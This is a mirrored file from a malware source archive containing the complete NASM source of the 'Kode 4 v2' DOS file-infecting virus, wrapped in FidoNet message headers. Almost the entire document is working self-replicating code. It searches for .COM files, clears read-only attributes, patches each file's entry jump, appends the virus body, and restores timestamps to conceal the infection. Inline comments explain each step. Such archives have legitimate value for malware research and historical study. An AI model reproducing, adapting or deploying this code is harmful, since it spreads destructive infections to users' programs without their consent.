mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-26 03:55:06 +00:00
223 lines
7.5 KiB
NASM
223 lines
7.5 KiB
NASM
|
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
|
|||
|
; Msg : 53 of 54
|
|||
|
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
|
|||
|
; To : - *.* - Fri 11 Nov 94 08:10
|
|||
|
; Subj : KOD4_399.ASM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;.RealName: Max Ivanov
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;* Kicked-up by MeteO (2:5030/136)
|
|||
|
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
|
|||
|
;* From : Mark Hapershaw, 2:283/718 (06 Nov 94 17:58)
|
|||
|
;* To : Mikko Hypponen
|
|||
|
;* Subj : KOD4_399.ASM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;@RFC-Path:
|
|||
|
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
|||
|
;18.n283!not-for-mail
|
|||
|
;@RFC-Return-Receipt-To: Mark.Hapershaw@f718.n283.z2.fidonet.org
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>>> Article From Evolution #2 - YAM '92
|
|||
|
;
|
|||
|
;Article Title: Kode 4 v2 Virus
|
|||
|
;Author: Soltan Griss
|
|||
|
|
|||
|
|
|||
|
seg_a segment byte public
|
|||
|
assume cs:seg_a, ds:seg_a
|
|||
|
|
|||
|
|
|||
|
org 100h
|
|||
|
V_Length equ vend-vstart
|
|||
|
KODE4 proc far
|
|||
|
start label near
|
|||
|
db 0E9h,00h,00h
|
|||
|
|
|||
|
|
|||
|
vstart equ $
|
|||
|
|
|||
|
mov si,100h ;get si to point to 100
|
|||
|
mov di,102h ;get di to point to 102
|
|||
|
lback: inc di ;increment di
|
|||
|
mov ax,word ptr [si] ;si is ponting to ax
|
|||
|
cmp word ptr [di],ax ;compare ax with di loc
|
|||
|
jne lback ;INE go back and inc di
|
|||
|
|
|||
|
|
|||
|
mov ax,word ptr [si+1]
|
|||
|
cmp ax,word ptr [di+1]
|
|||
|
je lout
|
|||
|
jmp lback
|
|||
|
|
|||
|
lout: add di,3h ;jmp stored in the end
|
|||
|
sub di,(v_length+100h) ;+3 to get to end and -
|
|||
|
mov si,di ;
|
|||
|
;**********************************************************************
|
|||
|
;*
|
|||
|
;* The above code can be re-written as follows...
|
|||
|
;* The above idea, although it works is very long in code....
|
|||
|
;* when DOS does a load and execute it pushes all registers the last
|
|||
|
;* register to be pushed contains the file length. so just subtract
|
|||
|
;* the current location
|
|||
|
;**********************************************************************
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;Host_Off: pop bp
|
|||
|
; sub bp,offset host_off
|
|||
|
; mov si,bp
|
|||
|
;
|
|||
|
;*** Before opening any file copy the original three bytes back to 100h
|
|||
|
;*** Because they will get overwritten when you check any new files
|
|||
|
lea di,temp_buff
|
|||
|
add di,si
|
|||
|
mov ax,word ptr [di]
|
|||
|
mov cl,byte ptr [di+2]
|
|||
|
mov di,100h
|
|||
|
mov word ptr [di],ax
|
|||
|
mov byte ptr [di+2],cl
|
|||
|
|
|||
|
|
|||
|
mov ah,4Eh ;Find first Com file
|
|||
|
mov dx,offset filename ; offset of "*.com"
|
|||
|
add dx,si
|
|||
|
int 21h
|
|||
|
jnc back
|
|||
|
jmp done
|
|||
|
Back:
|
|||
|
mov ah,43h ;get rid of read only
|
|||
|
mov al,0
|
|||
|
mov dx,9eh
|
|||
|
int 21h
|
|||
|
mov ah,43h
|
|||
|
mov al,01
|
|||
|
and cx,11111110b
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ax,3D02h ;Open file for read/writing
|
|||
|
mov dx,9Eh ;get file name from file DTA
|
|||
|
int 21h
|
|||
|
jnc next
|
|||
|
jmp done
|
|||
|
next: mov bx,ax ;save handle in bx
|
|||
|
mov ah,57h ;get time date
|
|||
|
mov al,0
|
|||
|
int 21h
|
|||
|
|
|||
|
push cx ;put in stack for later
|
|||
|
push dx
|
|||
|
|
|||
|
mov ax,4200h ; Move ptr to start of file
|
|||
|
xor cx,cx
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
|
|||
|
|
|||
|
mov ah,3fh ;load first 3 bytes
|
|||
|
mov cx,3
|
|||
|
|
|||
|
mov dx,offset temp_buff
|
|||
|
add dx,si
|
|||
|
int 21h
|
|||
|
|
|||
|
xor cx,cx ;move file pointer to end of file
|
|||
|
xor dx,dx
|
|||
|
mov ax,4202h
|
|||
|
int 21h
|
|||
|
sub ax,3 ; Fix for real location
|
|||
|
push ax
|
|||
|
; nop ;
|
|||
|
; nop ; used for debugging
|
|||
|
; nop ;
|
|||
|
; nop ;
|
|||
|
; nop
|
|||
|
|
|||
|
mov di,offset temp_buff
|
|||
|
add di,si
|
|||
|
mov word ptr [j_code2+si],ax; Save two bytes in a
|
|||
|
; word [jumpin]
|
|||
|
|
|||
|
cmp byte ptr [di],0e9h ;look for a jmp at begining
|
|||
|
jne infect
|
|||
|
|
|||
|
mov cx,word ptr [di+1] ;check for XXX bytes at end
|
|||
|
pop ax
|
|||
|
sub ax,v_length
|
|||
|
cmp ax, cx ; jump (id string to check)
|
|||
|
jne infect
|
|||
|
jmp finish
|
|||
|
|
|||
|
|
|||
|
|
|||
|
infect:
|
|||
|
|
|||
|
xor cx,cx ;move file pointer to begining
|
|||
|
xor dx,dx ;to write jump
|
|||
|
mov ax,4200h
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ah,40h ;write jump in first 3 bytes
|
|||
|
mov cx,3
|
|||
|
mov dx, offset j_code1
|
|||
|
add dx,si
|
|||
|
int 21h
|
|||
|
|
|||
|
xor cx,cx ;move file pointer to end of file
|
|||
|
xor dx,dx
|
|||
|
mov ax, 4202h
|
|||
|
int 21h
|
|||
|
|
|||
|
mov dx,offset vstart
|
|||
|
add dx,si ;Start writing at top of virus
|
|||
|
mov cx,(vend-vstart) ; Set for length of virus
|
|||
|
mov ah,40h ;Write Data into the file
|
|||
|
int 21h
|
|||
|
|
|||
|
|
|||
|
Finish: pop dx ;Restore old dates and times
|
|||
|
pop cx
|
|||
|
mov ah,57h
|
|||
|
mov al,01h
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ah,3Eh ;Close the file
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ah,4Fh ;Find Next file
|
|||
|
int 21h
|
|||
|
jc done
|
|||
|
jmp back
|
|||
|
|
|||
|
done:
|
|||
|
mov bp,100h
|
|||
|
jmp bp
|
|||
|
|
|||
|
|
|||
|
filename db "*.com",0
|
|||
|
DATA db " -=+ Kode4 +=-, The one and ONLY!$"
|
|||
|
|
|||
|
j_code1 db 0e9h
|
|||
|
j_code2 db 00h,00h
|
|||
|
temp_buff db 0cdh,020h,090h ; CD 20 NOP
|
|||
|
kode4 endp
|
|||
|
|
|||
|
vend equ $
|
|||
|
|
|||
|
seg_a ends
|
|||
|
|
|||
|
end start
|
|||
|
|
|||
|
;-+- WM v2.09/91-0245
|
|||
|
; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
;Yoo-hooo-oo, -!
|
|||
|
;
|
|||
|
;
|
|||
|
; <20> The Me<4D>eO
|
|||
|
;
|
|||
|
;/3 Enable 32-bit processing
|
|||
|
;
|
|||
|
;--- Aidstest Null: /Kill
|
|||
|
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
|
|||
|
|